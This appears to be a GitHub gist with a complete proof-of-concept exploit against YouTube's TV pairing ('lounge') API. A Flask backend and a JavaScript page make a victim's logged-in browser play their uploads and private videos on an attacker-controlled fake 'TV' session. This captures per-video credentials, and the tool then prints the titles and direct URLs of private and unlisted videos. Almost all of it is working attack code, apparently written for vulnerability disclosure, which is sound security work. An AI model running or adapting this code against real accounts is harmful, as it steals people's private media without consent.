Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
# POC Flow:
# 1. Request the victim/frontend to play all of his/her videos
# on the malicious "TV", and find out what videos are private.
#
# 2. Iterate over all of the victim's private videos,
# and request the victim/frontend to play all of
# them one by one. When the victim plays one, the
# malicious "TV" gets a credential for it.
import requests
import re
from flask import Flask, request, abort
import json
import threading
import logging
import time
from urllib.parse import unquote
import os
# Enter an API key with YouTube Data API enabled.
# It replaces the "[api_key]" placeholder of API_VIDEOS in process_videos().
YT_DATA_API_KEY = ""
# The host to bind the POC webserver to.
# It is also used to build the expected 'Host' header value and the
# URL that is printed once the server is running.
host_to_bind_to = "127.0.0.1"
# List of endpoints used by the script later.
# Extracted from requests made by the YouTube/YT TV JS,
# so some parameters have some seemingly "random" values.
# Bracketed placeholders ([video_ids], [api_key], [token], [sid], [gsid],
# [video_id], [ctt]) are filled in with str.replace() by the functions
# that use each endpoint.
API_VIDEOS = "https://www.googleapis.com/youtube/v3/videos?part=snippet%2C%20status&id=[video_ids]&key=[api_key]"
YT_SCREEN_ID = "https://www.youtube.com/api/lounge/pairing/generate_screen_id"
YT_TOKEN = "https://www.youtube.com/api/lounge/pairing/get_lounge_token_batch"
# Used once per lounge token by init_bind() to obtain the polling credentials.
YT_BIND_INIT = "https://www.youtube.com/api/lounge/bc/bind?device=LOUNGE_SCREEN&id=8700c39e-eec8-4923-8d84-41dcd5d0435f&name=YouTube%20on%20TV&app=lb-v4&theme=cl&capabilities=dsp&mdxVersion=2&loungeIdToken=[token]&VER=8&v=2&RID=580&CVER=1&zx=lmxe5k2biyyg&t=1"
# Polled repeatedly by bind() and bind_private().
YT_BIND = "https://www.youtube.com/api/lounge/bc/bind?device=LOUNGE_SCREEN&id=8700c39e-eec8-4923-8d84-41dcd5d0435f&name=YouTube%20on%20TV&app=lb-v4&theme=cl&capabilities=dsp&mdxVersion=2&loungeIdToken=[token]&VER=8&v=2&RID=rpc&SID=[sid]&CI=1&AID=3&gsessionid=[gsid]&TYPE=xmlhttp&zx=2icgcq6qwpat&t=1"
YT_GET_VIDEO_INFO = "https://www.youtube.com/get_video_info?html5=1&video_id=[video_id]&c=TVHTML5&vvt=[ctt]"
# Regexes used to grep for specific strings in the responses.
# Every pattern is a lookbehind / lazy match / lookahead triple, so
# re.findall() returns only the value between the surrounding quotes.
# Value following `["c","` (used as the [sid] placeholder of YT_BIND).
INIT_SID_REGEX = r"(?<=\[\"c\",\").+?(?=\")"
# Value following `["S","` (used as the [gsid] placeholder of YT_BIND).
INIT_GSID_REGEX = r"(?<=\[\"S\",\").+?(?=\")"
# Value of a `"videoIds":"..."` field; bind() splits it on commas.
VIDEOIDS_REGEX = r"(?<=\"videoIds\":\").+?(?=\")"
# Value of a `"ctt":"..."` field.
CTT_REGEX = r"(?<=\"ctt\":\").+?(?=\")"
# Value of a `videoId` field whose quotes are backslash-escaped in the
# response text, i.e. `\"videoId\":\"...\"`.
VIDEOID_REGEX = r"(?<=\\\"videoId\\\":\\\").+?(?=\\\")"
# Value of a `"url":"..."` field in the decoded 'get_video_info' response.
PRIVATE_URL_REGEX = r"(?<=\"url\":\").+?(?=\")"
# Value of a `"title":"..."` field in the decoded 'get_video_info' response.
PRIVATE_TITLE_REGEX = r"(?<=\"title\":\").+?(?=\")"
# Global variables used by the Flask server.
# They are written by the main flow at module level and read by the
# Flask request handlers. A `global` statement has no effect at module
# level, so plain assignments are used and every name gets an initial value.

# Lounge token currently handed out to the frontend (None until created).
lounge_token = None
# True once 'lounge_token' and 'victim_uploads_pl' may be served.
lounge_token_ready = False
# Counter identifying the current private video request.
current_private_video_request_id = 0
# Video ID of the current private video request (None until the first one).
current_private_video_request_video_id = None
# True once the first private video request has been prepared.
private_video_request_ready = False
# True once all private videos have been processed.
private_video_request_done = False
# The victim's 'uploads' playlist ID (None until the channel ID is entered).
victim_uploads_pl = None
# Flask server / endpoints
app = Flask(__name__)
# Disable the 'werkzeug' logger (presumably to keep per-request log
# lines out of the POC's console output).
log = logging.getLogger('werkzeug')
log.disabled = True
# Check the 'Host' header to protect against
# DNS rebinding attacks
@app.before_request
def before_request_callback():
    """Abort with 403 unless the 'Host' header is '<host_to_bind_to>:8090'."""
    expected_host = host_to_bind_to + ":8090"
    received_host = request.headers.get("host")
    if received_host != expected_host:
        abort(403)
# Serves the 'frontend.html' to the victim
@app.route("/")
def get_frontend():
    """Return the contents of 'frontend.html' from the working directory."""
    with open("frontend.html", "r") as frontend_file:
        page = frontend_file.read()
    return page
# Returns the initial configuration for the victim,
# which consists of the 'lounge_token' and the
# victim's 'uploads' playlist ID
@app.route('/get_lounge_token')
def get_lounge_token():
    """Return the initial configuration for the frontend.

    Returns:
        'not-ready' while ``lounge_token_ready`` is false; otherwise a JSON
        array of ``[lounge_token, victim_uploads_pl]``.
    """
    if not lounge_token_ready:
        return 'not-ready'
    initial_config = [lounge_token, victim_uploads_pl]
    return json.dumps(initial_config)
# Returns the current 'private video request' to the frontend.
# The frontend is polling this endpoint, and when one
# private video is processed, the backend updates the
# content to point to the next private video.
@app.route('/get_current_private_video')
def get_current_private_video():
    """Return the current private video request for the polling frontend.

    Returns:
        'not-ready' before the first request has been prepared, 'done' once
        every request has been processed, otherwise a JSON object with the
        keys "id", "lounge_token" and "video_id".
    """
    if not private_video_request_ready:
        return 'not-ready'
    if private_video_request_done:
        return 'done'
    # The request ID is read first; the main flow updates it last.
    current_request = {
        "id": current_private_video_request_id,
        "lounge_token": lounge_token,
        "video_id": current_private_video_request_video_id
    }
    return json.dumps(current_request)
# end_flask
# Generates a 'screen_id'
def get_screen_id():
    """Fetch a new screen ID.

    Returns:
        The response body of a GET request to ``YT_SCREEN_ID``.
    """
    print("[+] Getting screen_id...")
    response = requests.get(YT_SCREEN_ID)
    screen_id = response.text
    return screen_id
# Requests a 'loungeToken' with a 'screen_id'
def get_token(screen_id):
    """Exchange a screen ID for a lounge token.

    Args:
        screen_id: Value sent as the "screen_ids" form field to ``YT_TOKEN``.

    Returns:
        The "loungeToken" of the first entry in the response's "screens" list.
    """
    print("[+] Getting token for screen_id...")
    form_fields = {"screen_ids": screen_id}
    response = requests.post(YT_TOKEN, data=form_fields)
    first_screen = response.json()["screens"][0]
    return first_screen["loungeToken"]
# Gets the credentials required for the 'bind' endpoint
def init_bind(lounge_token):
    """Obtain the session credentials needed to poll the 'bind' endpoint.

    Args:
        lounge_token: Token substituted into ``YT_BIND_INIT``.

    Returns:
        A ``(sid, gsid)`` tuple: the first matches of ``INIT_SID_REGEX`` and
        ``INIT_GSID_REGEX`` in the response body.

    Raises:
        IndexError: If either pattern has no match in the response.
    """
    print("[+] Getting the credentials for polling...")
    init_url = YT_BIND_INIT.replace("[token]", lounge_token)
    body = requests.post(init_url).text
    sid_matches = re.findall(INIT_SID_REGEX, body)
    gsid_matches = re.findall(INIT_GSID_REGEX, body)
    return sid_matches[0], gsid_matches[0]
# Starts polling the 'bind' endpoint.
# Waits for the frontend to "play" the victim's
# 'uploads' playlist.
def bind(lounge_token, sid, gsid):
    """Poll the 'bind' endpoint until a list of video IDs shows up.

    Args:
        lounge_token: Token substituted for "[token]" in ``YT_BIND``.
        sid: Value substituted for "[sid]".
        gsid: Value substituted for "[gsid]".

    Returns:
        The list of video IDs from the first response that matches
        ``VIDEOIDS_REGEX``, or an empty list if a response reports an
        empty "videoIds" array.
    """
    print("[+] Starting to poll leanback bind endpoint...")
    # The URL does not change between polls, so it is built once.
    bind_url = (
        YT_BIND.replace("[token]", lounge_token)
        .replace("[sid]", sid)
        .replace("[gsid]", gsid)
    )
    while True:
        body = requests.get(bind_url).text
        if "\\\"videoIds\\\":[]" in body:
            print("[!] Victim has no videos!")
            return []
        matches = re.findall(VIDEOIDS_REGEX, body)
        if not matches:
            # Nothing relevant in this response yet; poll again.
            continue
        video_ids = matches[0].split(",")
        print("[+] Victim connected! Videos: " + str(len(video_ids)))
        return video_ids
# Queries the YouTube Data API to find out the
# privacy status of the provided list of videos.
def process_videos(video_ids):
    """Classify video IDs as public, unlisted or private via the Data API.

    The IDs are sent to the ``videos`` endpoint in batches, because the
    endpoint only accepts a limited number of IDs per call. Every ID the
    API does not return is treated as private.

    Args:
        video_ids: List of video ID strings. May be empty, in which case
            no request is made.

    Returns:
        A tuple ``(unlisted_videos, private_video_ids)`` where
        ``unlisted_videos`` is a list of ``[id, title]`` pairs and
        ``private_video_ids`` is a list of IDs in their original order.

    Raises:
        requests.HTTPError: If the API answers with an error status
            (for example because ``YT_DATA_API_KEY`` is missing or invalid).
    """
    # Maximum number of IDs sent in a single 'videos' request.
    batch_size = 50
    unlisted_videos = []
    # Sets keep the membership tests below O(1).
    unlisted_video_ids = set()
    public_video_ids = set()
    print("[+] Querying YouTube Data API to find which videos are private/unlisted...")
    for start in range(0, len(video_ids), batch_size):
        batch = video_ids[start:start + batch_size]
        api_url = API_VIDEOS.replace("[api_key]", YT_DATA_API_KEY)
        api_url = api_url.replace("[video_ids]", ",".join(batch))
        r = requests.get(api_url)
        # Fail with the HTTP error instead of a KeyError on "items" below.
        r.raise_for_status()
        for item in r.json()["items"]:
            if item["status"]["privacyStatus"] == "unlisted":
                unlisted_video_ids.add(item["id"])
                unlisted_videos.append([item["id"], item["snippet"]["title"]])
            else:
                public_video_ids.add(item["id"])
    # Anything the API did not return is neither public nor unlisted.
    private_video_ids = [
        video_id
        for video_id in video_ids
        if video_id not in public_video_ids
        and video_id not in unlisted_video_ids
    ]
    print("\n[+] Victim has:")
    print(" " + str(len(public_video_ids)) + " public videos")
    print(" " + str(len(unlisted_video_ids)) + " unlisted videos")
    print(" " + str(len(private_video_ids)) + " private videos")
    return unlisted_videos, private_video_ids
# Starts polling the 'bind' endpoint.
# Waits for the frontend to "play" one of the
# victim's private videos.
def bind_private(lounge_token, sid, gsid, video_id):
    """Poll the 'bind' endpoint until a ctt for ``video_id`` is seen.

    Args:
        lounge_token: Token substituted for "[token]" in ``YT_BIND``.
        sid: Value substituted for "[sid]".
        gsid: Value substituted for "[gsid]".
        video_id: The video ID the response must refer to.

    Returns:
        The first ``CTT_REGEX`` match of the first response whose first
        ``VIDEOID_REGEX`` match equals ``video_id``.
    """
    print("[+] Starting to poll leanback bind endpoint for private video '" + video_id + "'...")
    # The URL does not change between polls, so it is built once.
    bind_url = (
        YT_BIND.replace("[token]", lounge_token)
        .replace("[sid]", sid)
        .replace("[gsid]", gsid)
    )
    while True:
        body = requests.get(bind_url).text
        ctt_find = re.findall(CTT_REGEX, body)
        video_id_find = re.findall(VIDEOID_REGEX, body)
        if ctt_find and video_id_find and video_id_find[0] == video_id:
            return ctt_find[0]
# Queries the 'get_video_info' endpoint with the
# credentials from the victim to get one private video's
# raw video url and title.
def get_private_video_info(video_id, ctt):
    """Query 'get_video_info' for one video and extract its URL and title.

    Args:
        video_id: Value substituted for "[video_id]" in ``YT_GET_VIDEO_INFO``.
        ctt: Value substituted for "[ctt]".

    Returns:
        A ``(url, title)`` tuple: the first matches of ``PRIVATE_URL_REGEX``
        and ``PRIVATE_TITLE_REGEX`` in the URL-decoded response.

    Raises:
        IndexError: If either pattern has no match in the response.
    """
    print("[+] Requesting 'get_video_info' with ctt for '" + video_id + "'...")
    video_url = YT_GET_VIDEO_INFO.replace("[video_id]", video_id).replace("[ctt]", ctt)
    client_headers = {
        "X-YouTube-Client-Name": "TVHTML5",
        "X-YouTube-Client-Version": "6.20180913",
    }
    raw_body = requests.get(video_url, headers=client_headers).text
    # URL-decode the body and turn escaped ampersands back into '&'.
    response = unquote(raw_body).replace("\\u0026", "&")
    url_matches = re.findall(PRIVATE_URL_REGEX, response)
    url = url_matches[0]
    title_matches = re.findall(PRIVATE_TITLE_REGEX, response)
    title = title_matches[0]
    return url, title
# Start of the main POC flow
# Start the Flask server in a background thread.
# The thread is a daemon so that the process can still exit when the
# main flow below raises or is interrupted, instead of being kept alive
# by the server thread.
print("[+] Starting Flask in a background thread...")
flask_thread = threading.Thread(
    target=app.run,
    kwargs={"host": host_to_bind_to, "port": 8090, "use_reloader": False},
    daemon=True,
)
flask_thread.start()
# Presumably gives the server time to start before the URL is printed.
time.sleep(1)
print("\n[+] Server is running. Send 'http://" + host_to_bind_to + ":8090' to vitim.\n")
# Request the victim's channel ID from the user.
# Surrounding whitespace is stripped, and the prompt is repeated until the
# input has at least two characters, because the conversion below replaces
# the second character.
channel_id = input("[?] Enter the victim's channel ID: ").strip()
while len(channel_id) < 2:
    print("[!] The channel ID must be at least two characters long.")
    channel_id = input("[?] Enter the victim's channel ID: ").strip()
# Convert the channel ID to the victim's 'uploads' playlist ID
# by replacing the second character with 'U'.
victim_uploads_pl = channel_id[0] + "U" + channel_id[2:]
print("[+] Victim's 'uploads' playlist ID: " + victim_uploads_pl)
print("[*] 'uploads' playlist's ID is just the channel id, but the second char 'C' -> 'U'")
print("[*] '" + channel_id + "' -> '" + victim_uploads_pl + "'\n")
# Step 1 - Requesting the victim to "play" his/her
# 'uploads' playlist.
screen_id = get_screen_id()
lounge_token = get_token(screen_id)
sid, gsid = init_bind(lounge_token)
# From here on the '/get_lounge_token' endpoint serves the token and
# playlist ID instead of 'not-ready'.
lounge_token_ready = True
# Polls until a response contains the video IDs (or reports none).
video_ids = bind(lounge_token, sid, gsid)
# Process these videos and find out which one is private/unlisted.
unlisted_videos, private_video_ids = process_videos(video_ids)
# Print the ID, title and youtu.be link of each unlisted video.
print("\n[+] Victim's unlisted videos:")
for unlisted_id, unlisted_title in unlisted_videos:
    print(f"\n ID: {unlisted_id}")
    print(f" Title: {unlisted_title}")
    print(f" YouTube URL: https://youtu.be/{unlisted_id}")
print("")
# Step 2 - Go through the private videos one at a time and ask the
# frontend to "play" each of them.
print("[+] Getting the vitim's private videos...")
private_videos = []
total_private_videos = len(private_video_ids)
for video_id in private_video_ids:
    # Publish the video ID first; the request ID is bumped last, so the
    # frontend only acts once everything below has been updated.
    current_private_video_request_video_id = video_id
    # Fresh credentials are created for every video.
    screen_id = get_screen_id()
    lounge_token = get_token(screen_id)
    sid, gsid = init_bind(lounge_token)
    # Has an effect only on the first iteration; afterwards it is already True.
    private_video_request_ready = True
    # A new, larger request ID keeps the frontend & backend in sync.
    current_private_video_request_id += 1
    print(f"[{current_private_video_request_id}/{total_private_videos}] Requesting frontend to play '{video_id}'...")
    ctt = bind_private(lounge_token, sid, gsid, video_id)
    print(f"[+] Got CTT '{ctt}' for video '{video_id}'!")
    url, title = get_private_video_info(video_id, ctt)
    private_videos.append([video_id, ctt, title, url])
# With no private videos the loop never ran, so the ready flag is set
# here as well; together with the done flag this makes the frontend
# stop polling.
private_video_request_ready = True
private_video_request_done = True
# Print the collected details of each private video.
print("\n[+] Victim's private videos:")
for private_id, _ctt, private_title, direct_url in private_videos:
    print(f"\n ID: {private_id}")
    # '+' characters in the title are shown as spaces.
    print(" Title: " + private_title.replace("+", " "))
    print(f" YouTube URL: https://youtu.be/{private_id}")
    print(f" Direct video URL: {direct_url}")
print("")
print("[+] Done")
# Wait for the frontend to receive the 'done' command from
# the poll endpoint.
time.sleep(2)
# Hard-exit the whole process; this also ends the Flask thread,
# which is not stopped in any other way.
os._exit(0)
<h4 id="log"></h4>
<script>
// Append one log entry, followed by a <br>, to the "log" element.
function log(message) {
    var logElement = document.getElementById("log")
    logElement.innerHTML = logElement.innerHTML + "\n " + message + "<br>"
}
// Return a promise that resolves after `ms` milliseconds.
function sleep(ms) {
    return new Promise(function (resolve) {
        setTimeout(resolve, ms);
    });
}
// Send the "setPlaylist" request that plays a video/playlist on the "TV".
// `idType` is the parameter name ("listId" or "videoId") and `id` its value.
// The returned promise resolves with the response on load and with
// undefined on a network error; it never rejects.
function send_command(loungeToken, id, idType) {
    var params = "{\"" + idType + "\":\"" + id + "\",\"currentIndex\":0}"
    var url = "https://www.youtube.com/api/lounge/bc/bind?device=REMOTE_CONTROL&id=&name=Desktop&app=youtube-desktop&mdxVersion=3&VER=8&v=2&ui=1&method=setPlaylist&params=" + params + "&loungeIdToken=" + loungeToken
    return new Promise(function (resolve) {
        var xhr = new XMLHttpRequest()
        xhr.open("post", url, true)
        xhr.withCredentials = true;
        xhr.onload = function () {
            resolve(xhr.response)
        }
        xhr.onerror = function () {
            resolve()
        }
        xhr.send("count=0")
    });
}
// Send a GET request.
// Used to query the backend.
// Resolves with the response once the request has loaded and rejects
// with an Error on a network failure, so that a caller awaiting the
// promise does not wait forever.
function get(url) {
    return new Promise(function (resolve, reject) {
        var xhr = new XMLHttpRequest()
        xhr.open("get", url, true)
        xhr.onload = function () {
            resolve(xhr.response)
        };
        xhr.onerror = function () {
            reject(new Error("GET " + url + " failed"))
        };
        xhr.send()
    });
}
// Drive the frontend side of the POC:
// step 1 polls the backend for the lounge token and playlist ID and
// sends the playlist to the "TV"; step 2 polls for private video
// requests and sends each new one to the "TV" until the backend
// answers "done".
async function main() {
    log("[+] Page loaded")

    // Resolve the backend endpoints relative to the page URL, so that a
    // query string or fragment in the address bar cannot corrupt them.
    var loungeTokenUrl = new URL("get_lounge_token", window.location.href).href
    var privateVideoUrl = new URL("get_current_private_video", window.location.href).href

    // Start of "Step 1"
    // Poll the backend for the 'loungeToken' and for which playlist to play.
    log("[+] Polling backend for loungeTokenResponse...")
    var loungeTokenResponse = "not-ready"
    while (loungeTokenResponse == "not-ready") {
        loungeTokenResponse = await get(loungeTokenUrl)
        await sleep(200)
    }
    log("[+] Got loungeTokenResponse: " + loungeTokenResponse)
    loungeTokenResponse = JSON.parse(loungeTokenResponse)

    // Play the playlist requested by the backend.
    log("[+] Triggering malicious \"TV\" to play all uploads of victim...")
    await send_command(loungeTokenResponse[0], loungeTokenResponse[1], "listId")

    // Start of "Step 2"
    // Poll the backend to find out which private video to play.
    log("[+] Polling backend for private video requests...")
    var previous_id = 0
    while (true) {
        var private_video_request = await get(privateVideoUrl)
        if (private_video_request == "done") {
            break
        }
        // On "not-ready" nothing is done except waiting below, so the
        // backend is polled at most once per sleep interval.
        if (private_video_request != "not-ready") {
            private_video_request = JSON.parse(private_video_request)
            // The ID has to be bigger than the last handled request.
            // This way the backend & frontend can stay in sync
            // to not play the same video multiple times.
            if (private_video_request["id"] > previous_id) {
                log("[+] Backend requested to play the private video: " + private_video_request["video_id"])
                // Play the current private video on the malicious "TV".
                log("[+] Playling private video '" + private_video_request["video_id"] + "' on malicious \"TV\"...")
                await send_command(private_video_request["lounge_token"], private_video_request["video_id"], "videoId")
                // Remember the ID that was actually handled.
                previous_id = private_video_request["id"]
            }
        }
        await sleep(200)
    }
    log("[+] Done")
}
// Surface failures (e.g. an unparsable backend response) in the page log
// instead of leaving an unhandled promise rejection.
main().catch(function (error) {
    log("[!] " + error)
})
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment